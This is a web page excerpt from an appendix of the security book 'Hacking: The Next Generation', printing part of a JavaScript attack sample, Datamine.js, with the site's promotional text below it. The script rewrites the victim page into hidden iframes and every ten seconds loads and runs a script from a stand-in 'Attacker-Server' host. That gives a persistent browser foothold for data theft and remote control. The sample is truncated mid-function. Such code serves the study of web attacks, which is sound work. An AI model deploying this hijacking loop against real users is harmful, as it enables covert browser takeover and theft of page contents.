Appendix A. Chapter 2 Source Code Samples

The following sections contain source code samples from Chapter 2.

Datamine.js

function spotter(){ var bigframe=parent.document.documentElement.innerHTML; iframeHTML='<IFRAME NAME="Picture" iframe id="Picture-id001" width="100%" height="100%" scrolling="auto" frameborder="0"></IFRAME>'; iframeHTML+='<IFRAME NAME="Control" iframe id="Control-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>'; iframeHTML+='<IFRAME NAME="Data" iframe id="Data-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>'; iframeHTML+='<IFRAME NAME="CrossDomain" iframe id="CrossDomain-id001" width="0%" height="0%" scrolling="off" frameborder="0"></IFRAME>'; document.body.innerHTML=iframeHTML; setInterval('controlFrameFunction()',10000); var victimFrame = document.getElementById('Picture'); var newVictimContents = bigframe.replace("Datamine.js","noresponse.js"); var newVictimFrame = victimFrame.contentWindow.document; newVictimFrame.open(); newVictimFrame.write(newVictimContents); newVictimFrame.close(); document.all.Picture.style.visibility="visible"; } function controlFrameFunction() { var controlFrameHTML = "<html><body>"; controlFrameHTML += "</script>"; controlFrameHTML += "<script src='http://Attacker- Server/execute.js?trigger="+randomnumber+"'>"; controlFrameHTML += "</script>"; var controlFrame = document.getElementById('Control'); var controlContents = controlFrameHTML; var newControlContents = controlFrame.contentWindow.document; ...

Get Hacking: The Next Generation now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Hacking: The Next Generation by Nitesh Dhanjani, Billy Rios, Brett Hardin

Appendix A. Chapter 2 Source Code Samples

Datamine.js

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly